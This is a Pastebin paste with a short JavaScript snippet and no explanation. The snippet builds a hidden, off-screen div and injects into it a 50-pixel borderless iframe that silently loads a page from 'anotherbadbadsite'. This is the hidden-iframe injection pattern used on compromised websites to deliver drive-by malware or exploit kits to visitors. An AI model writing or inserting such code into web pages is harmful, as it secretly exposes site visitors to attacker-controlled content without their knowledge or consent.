Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (function() {
- var url = "http://anotherbadbadsite/index.php?144993452d8c92b9ff23e2b7adfdd683";
- var node = document.createElement("div");
- node.style.zIndex = -10000;
- node.style.visibility = 'hidden';
- node.style.position = 'absolute';
- node.style.width = '50px';
- node.style.height = '50px';
- node.innerHTML = "<iframe width='50' height='50' frameborder='0' scrolling='no' src='" + url + "'></iframe>";
- document.body.appendChild(node);
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement